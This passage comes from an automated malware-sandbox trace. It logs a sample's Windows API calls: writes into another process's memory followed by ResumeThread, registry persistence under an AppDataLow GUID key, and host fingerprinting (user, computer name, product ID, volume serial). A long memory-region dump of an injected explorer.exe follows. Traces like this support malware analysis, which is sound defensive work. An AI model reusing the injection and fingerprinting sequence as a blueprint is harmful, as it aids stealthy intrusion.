LastBranchToRip=0x0, LastBranchFromRip=0x0, LastExceptionToRip=0x0, LastExceptionFromRip=0x0)) returned 0x0 [0208.691] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0208.691] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0xb095520000) returned 0x0 [0208.701] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0208.701] CloseHandle (hObject=0x1a8) returned 1 [0208.701] VirtualProtectEx (in: hProcess=0x1a0, lpAddress=0x7ff977f39fa0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0xb0938cf930 | out: lpflOldProtect=0xb0938cf930*=0x20) returned 1 [0208.701] NtWriteVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x7ff977f39fa0, Buffer=0xb0938cf938*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0xb0938cf3b0 | out: Buffer=0xb0938cf938*, NumberOfBytesWritten=0xb0938cf3b0*=0x4) returned 0x0 [0208.704] VirtualProtectEx (in: hProcess=0x1a0, lpAddress=0x7ff977f39fa0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0xb0938cf930 | out: lpflOldProtect=0xb0938cf930*=0x40) returned 1 [0208.704] ResumeThread (hThread=0x1a4) returned 0x1 [0208.809] CloseHandle (hObject=0x1a4) returned 1 [0208.809] CloseHandle (hObject=0x1a0) returned 1 [0208.809] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegCreateKeyA") returned 0x7ff976fc6dc0 [0208.810] RegCreateKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0xb0938cf9d0 | out: phkResult=0xb0938cf9d0*=0x1a0) returned 0x0 [0208.810] RegQueryValueExA (in: hKey=0x1a0, lpValueName="Client", lpReserved=0x0, lpType=0xb0938cf9c8, lpData=0x876ba0, lpcbData=0xb0938cf9c0*=0x28 | out: lpType=0xb0938cf9c8*=0x0, lpData=0x876ba0*=0xe8, lpcbData=0xb0938cf9c0*=0x28) returned 0x2 [0208.810] GetProcAddress (hModule=0x7ff976f80000, lpProcName="GetUserNameW") returned 0x7ff976f9da40 [0208.810] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0xb0938cf970 | out: lpBuffer=0x0, pcbBuffer=0xb0938cf970) returned 0 [0208.810] GetUserNameW (in: lpBuffer=0xb095a03d20, pcbBuffer=0xb0938cf970 | out: lpBuffer="CIiHmnxMn6Ps", pcbBuffer=0xb0938cf970) returned 1 [0208.811] GetComputerNameW (in: lpBuffer=0x0, nSize=0xb0938cf970 | out: lpBuffer=0x0, nSize=0xb0938cf970) returned 0 [0208.811] GetComputerNameW (in: lpBuffer=0xb095a03d20, nSize=0xb0938cf970 | out: lpBuffer="LHNIWSJ", nSize=0xb0938cf970) returned 1 [0208.811] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegSetValueExA") returned 0x7ff976f82680 [0208.811] RegSetValueExA (in: hKey=0x1a0, lpValueName="Client", Reserved=0x0, dwType=0x3, lpData=0x876ba0*, cbData=0x28 | out: lpData=0x876ba0*) returned 0x0 [0208.811] RegCloseKey (hKey=0x1a0) returned 0x0 [0208.812] wsprintfA (in: param_1=0xb095a03d20, param_2="%08x%08x%08x%08x" | out: param_1="c5449c7a8bfcc0923b720af430d5cede") returned 32 [0208.812] GetComputerNameA (in: lpBuffer=0xb0938cf8b0, nSize=0xb0938cf9c0 | out: lpBuffer="LHNIWSJ", nSize=0xb0938cf9c0) returned 1 [0208.812] lstrlenA (lpString="LHNIWSJ") returned 7 [0208.812] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegOpenKeyExA") returned 0x7ff976f97d70 [0208.812] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0xb0938cf8a0 | out: phkResult=0xb0938cf8a0*=0x1a0) returned 0x0 [0208.812] RegQueryValueExA (in: hKey=0x1a0, lpValueName="ProductID", lpReserved=0x0, lpType=0x0, lpData=0xb0938cf8b0, lpcbData=0xb0938cf9c0*=0x100 | out: lpType=0x0, lpData=0xb0938cf8b0*=0x30, lpcbData=0xb0938cf9c0*=0x18) returned 0x0 [0208.812] lstrlenA (lpString="00330-80107-01105-AA992") returned 23 [0208.812] RegQueryValueExA (in: hKey=0x1a0, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0xb0938cf8b0, lpcbData=0xb0938cf9c0*=0x100 | out: lpType=0x0, lpData=0xb0938cf8b0*=0x57, lpcbData=0xb0938cf9c0*=0xf) returned 0x0 [0208.812] lstrlenA (lpString="Windows 10 Pro") returned 14 [0208.812] RegQueryValueExA (in: hKey=0x1a0, lpValueName="CurrentVersion", lpReserved=0x0, lpType=0x0, lpData=0xb0938cf8b0, lpcbData=0xb0938cf9c0*=0x100 | out: lpType=0x0, lpData=0xb0938cf8b0*=0x36, lpcbData=0xb0938cf9c0*=0x4) returned 0x0 [0208.812] lstrlenA (lpString="6.3") returned 3 [0208.812] RegQueryValueExA (in: hKey=0x1a0, lpValueName="InstallDate", lpReserved=0x0, lpType=0x0, lpData=0xb0938cf8a8, lpcbData=0xb0938cf9c0*=0x4 | out: lpType=0x0, lpData=0xb0938cf8a8*=0x41, lpcbData=0xb0938cf9c0*=0x4) returned 0x0 [0208.812] RegCloseKey (hKey=0x1a0) returned 0x0 [0208.812] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0xb0938cf9d8, lpMaximumComponentLength=0xb0938cf9c0, lpFileSystemFlags=0xb0938cf9d0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xb0938cf9d8*=0xd2ca4def, lpMaximumComponentLength=0xb0938cf9c0*=0xff, lpFileSystemFlags=0xb0938cf9d0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1 [0208.813] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x82c5b8, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0xb0938cfa98 | out: lpThreadId=0xb0938cfa98*=0xb28) returned 0x1a0 [0208.813] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0xb0938cfa28 | out: phkResult=0xb0938cfa28*=0x1a4) returned 0x0 [0208.813] RegQueryValueExA (in: hKey=0x1a4, lpValueName="Scr", lpReserved=0x0, lpType=0xb0938cf990, lpData=0x0, lpcbData=0xb0938cfa90*=0x87d018 | out: lpType=0xb0938cf990*=0x0, lpData=0x0, lpcbData=0xb0938cfa90*=0x0) returned 0x2 [0208.813] RegCloseKey (hKey=0x1a4) returned 0x0 [0208.813] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x817ea4, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0xb0938cfa98 | out: lpThreadId=0xb0938cfa98*=0xb34) returned 0x1a4 Thread: id = 32 os_tid = 0xb44 Thread: id = 97 os_tid = 0xb28 Thread: id = 98 os_tid = 0xb34 Process: id = "12" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x1ded8000" os_pid = "0x834" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x198" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1102 start_va = 0xb0000 end_va = 0xbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 1103 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1104 start_va = 0xd0000 end_va = 0xe3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1105 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1106 start_va = 0x170000 end_va = 0x173fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 1107 start_va = 0x180000 end_va = 0x182fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1108 start_va = 0x190000 end_va = 0x191fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1109 start_va = 0x1a0000 end_va = 0x25dfff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1110 start_va = 0x260000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1111 start_va = 0x2e0000 end_va = 0x2e6fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1112 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x2f0000 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 1113 start_va = 0x300000 end_va = 0x300fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1114 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1115 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1116 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1117 start_va = 0x430000 end_va = 0x430fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 1118 start_va = 0x440000 end_va = 0x440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1119 start_va = 0x450000 end_va = 0x450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1120 start_va = 0x460000 end_va = 0x463fff entry_point = 0x460000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1121 start_va = 0x470000 end_va = 0x470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1122 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1123 start_va = 0x490000 end_va = 0x617fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1124 start_va = 0x620000 end_va = 0x7a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1125 start_va = 0x7b0000 end_va = 0x1baffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 1126 start_va = 0x1bb0000 end_va = 0x1bc2fff entry_point = 0x1bb0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001c.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db") Region: id = 1127 start_va = 0x1bd0000 end_va = 0x1c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 1128 start_va = 0x1c50000 end_va = 0x1c6bfff entry_point = 0x1c50000 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000036.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000036.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000036.db") Region: id = 1129 start_va = 0x1c70000 end_va = 0x1c72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 1130 start_va = 0x1c80000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 1131 start_va = 0x1c90000 end_va = 0x1fc6fff entry_point = 0x1c90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1132 start_va = 0x1fd0000 end_va = 0x204ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 1133 start_va = 0x2050000 end_va = 0x20cffff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 1134 start_va = 0x20d0000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 1135 start_va = 0x2150000 end_va = 0x21b0fff entry_point = 0x2150000 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 1136 start_va = 0x21c0000 end_va = 0x21c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021c0000" filename = "" Region: id = 1137 start_va = 0x21d0000 end_va = 0x21f9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021d0000" filename = "" Region: id = 1138 start_va = 0x2200000 end_va = 0x22defff entry_point = 0x2200000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1139 start_va = 0x22e0000 end_va = 0x235ffff entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1140 start_va = 0x2360000 end_va = 0x23dffff entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 1141 start_va = 0x23e0000 end_va = 0x245ffff entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 1142 start_va = 0x2460000 end_va = 0x2461fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 1143 start_va = 0x2470000 end_va = 0x2471fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002470000" filename = "" Region: id = 1144 start_va = 0x2480000 end_va = 0x257ffff entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 1145 start_va = 0x2580000 end_va = 0x2581fff entry_point = 0x2580000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 1146 start_va = 0x2590000 end_va = 0x2594fff entry_point = 0x2590000 region_type = mapped_file name = "oleaccrc.dll.mui" filename = "\\Windows\\System32\\en-US\\oleaccrc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\oleaccrc.dll.mui") Region: id = 1147 start_va = 0x25a0000 end_va = 0x2657fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 1148 start_va = 0x2660000 end_va = 0x2663fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002660000" filename = "" Region: id = 1149 start_va = 0x2670000 end_va = 0x276ffff entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 1150 start_va = 0x2770000 end_va = 0x2770fff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 1151 start_va = 0x2780000 end_va = 0x37bffff entry_point = 0x2780000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1152 start_va = 0x37c0000 end_va = 0x37c6fff entry_point = 0x0 region_type = private name = "private_0x00000000037c0000" filename = "" Region: id = 1153 start_va = 0x37d0000 end_va = 0x37d0fff entry_point = 0x0 region_type = private name = "private_0x00000000037d0000" filename = "" Region: id = 1154 start_va = 0x37e0000 end_va = 0x37e0fff entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 1155 start_va = 0x37f0000 end_va = 0x37f0fff entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 1156 start_va = 0x3800000 end_va = 0x387ffff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 1157 start_va = 0x3880000 end_va = 0x3881fff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 1158 start_va = 0x3890000 end_va = 0x3890fff entry_point = 0x0 region_type = private name = "private_0x0000000003890000" filename = "" Region: id = 1159 start_va = 0x38a0000 end_va = 0x38a0fff entry_point = 0x0 region_type = private name = "private_0x00000000038a0000" filename = "" Region: id = 1160 start_va = 0x38b0000 end_va = 0x38b0fff entry_point = 0x0 region_type = private name = "private_0x00000000038b0000" filename = "" Region: id = 1161 start_va = 0x38c0000 end_va = 0x38c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038c0000" filename = "" Region: id = 1162 start_va = 0x38d0000 end_va = 0x38d3fff entry_point = 0x38d0000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1163 start_va = 0x38e0000 end_va = 0x38e0fff entry_point = 0x0 region_type = private name = "private_0x00000000038e0000" filename = "" Region: id = 1164 start_va = 0x38f0000 end_va = 0x38f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038f0000" filename = "" Region: id = 1165 start_va = 0x3900000 end_va = 0x3900fff entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1166 start_va = 0x3910000 end_va = 0x3912fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003910000" filename = "" Region: id = 1167 start_va = 0x3920000 end_va = 0x3958fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003920000" filename = "" Region: id = 1168 start_va = 0x3960000 end_va = 0x3962fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 1169 start_va = 0x3970000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003970000" filename = "" Region: id = 1170 start_va = 0x3980000 end_va = 0x3980fff entry_point = 0x0 region_type = private name = "private_0x0000000003980000" filename = "" Region: id = 1171 start_va = 0x3990000 end_va = 0x3993fff entry_point = 0x3990000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1172 start_va = 0x39a0000 end_va = 0x39a1fff entry_point = 0x39a0000 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 1173 start_va = 0x39b0000 end_va = 0x39b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039b0000" filename = "" Region: id = 1174 start_va = 0x39c0000 end_va = 0x39c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039c0000" filename = "" Region: id = 1175 start_va = 0x39d0000 end_va = 0x39d1fff entry_point = 0x39d0000 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 1176 start_va = 0x39e0000 end_va = 0x39e0fff entry_point = 0x39e0000 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 1177 start_va = 0x39f0000 end_va = 0x39f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039f0000" filename = "" Region: id = 1178 start_va = 0x3a00000 end_va = 0x3a00fff entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 1179 start_va = 0x3a10000 end_va = 0x3a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 1180 start_va = 0x3a90000 end_va = 0x3a90fff entry_point = 0x0 region_type = private name = "private_0x0000000003a90000" filename = "" Region: id = 1181 start_va = 0x3aa0000 end_va = 0x3aa3fff entry_point = 0x3aa0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1182 start_va = 0x3ab0000 end_va = 0x3af2fff entry_point = 0x3ab0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000f.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db") Region: id = 1183 start_va = 0x3b00000 end_va = 0x3b03fff entry_point = 0x3b00000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1184 start_va = 0x3b10000 end_va = 0x3b10fff entry_point = 0x0 region_type = private name = "private_0x0000000003b10000" filename = "" Region: id = 1185 start_va = 0x3b20000 end_va = 0x3b22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b20000" filename = "" Region: id = 1186 start_va = 0x3b30000 end_va = 0x3bbafff entry_point = 0x3b30000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1187 start_va = 0x3bc0000 end_va = 0x3bd0fff entry_point = 0x3bc0000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1188 start_va = 0x3be0000 end_va = 0x3c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 1189 start_va = 0x3c60000 end_va = 0x3cdffff entry_point = 0x0 region_type = private name = "private_0x0000000003c60000" filename = "" Region: id = 1190 start_va = 0x3ce0000 end_va = 0x3d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ce0000" filename = "" Region: id = 1191 start_va = 0x3d60000 end_va = 0x3ddffff entry_point = 0x0 region_type = private name = "private_0x0000000003d60000" filename = "" Region: id = 1192 start_va = 0x3de0000 end_va = 0x42d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 1193 start_va = 0x42e0000 end_va = 0x435ffff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 1194 start_va = 0x4360000 end_va = 0x445ffff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 1195 start_va = 0x4460000 end_va = 0x4461fff entry_point = 0x4460000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1196 start_va = 0x4470000 end_va = 0x456ffff entry_point = 0x4470000 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 1197 start_va = 0x4570000 end_va = 0x4570fff entry_point = 0x4570000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 1198 start_va = 0x4580000 end_va = 0x45b1fff entry_point = 0x4580000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui") Region: id = 1199 start_va = 0x45c0000 end_va = 0x45c1fff entry_point = 0x45c0000 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 1200 start_va = 0x45d0000 end_va = 0x45d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045d0000" filename = "" Region: id = 1201 start_va = 0x45e0000 end_va = 0x465ffff entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 1202 start_va = 0x4660000 end_va = 0x475ffff entry_point = 0x4660000 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 1203 start_va = 0x47e0000 end_va = 0x485ffff entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 1204 start_va = 0x4860000 end_va = 0x48dffff entry_point = 0x0 region_type = private name = "private_0x0000000004860000" filename = "" Region: id = 1205 start_va = 0x48e0000 end_va = 0x495ffff entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 1206 start_va = 0x4960000 end_va = 0x515ffff entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 1207 start_va = 0x5160000 end_va = 0x51dffff entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 1208 start_va = 0x51e0000 end_va = 0x51e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051e0000" filename = "" Region: id = 1209 start_va = 0x51f0000 end_va = 0x51f1fff entry_point = 0x51f0000 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 1210 start_va = 0x5200000 end_va = 0x5200fff entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 1211 start_va = 0x5210000 end_va = 0x5212fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005210000" filename = "" Region: id = 1212 start_va = 0x5220000 end_va = 0x5228fff entry_point = 0x0 region_type = private name = "private_0x0000000005220000" filename = "" Region: id = 1213 start_va = 0x5230000 end_va = 0x5233fff entry_point = 0x0 region_type = private name = "private_0x0000000005230000" filename = "" Region: id = 1214 start_va = 0x5240000 end_va = 0x5240fff entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 1215 start_va = 0x5250000 end_va = 0x5251fff entry_point = 0x5250000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1216 start_va = 0x5260000 end_va = 0x5260fff entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 1217 start_va = 0x5270000 end_va = 0x5278fff entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" 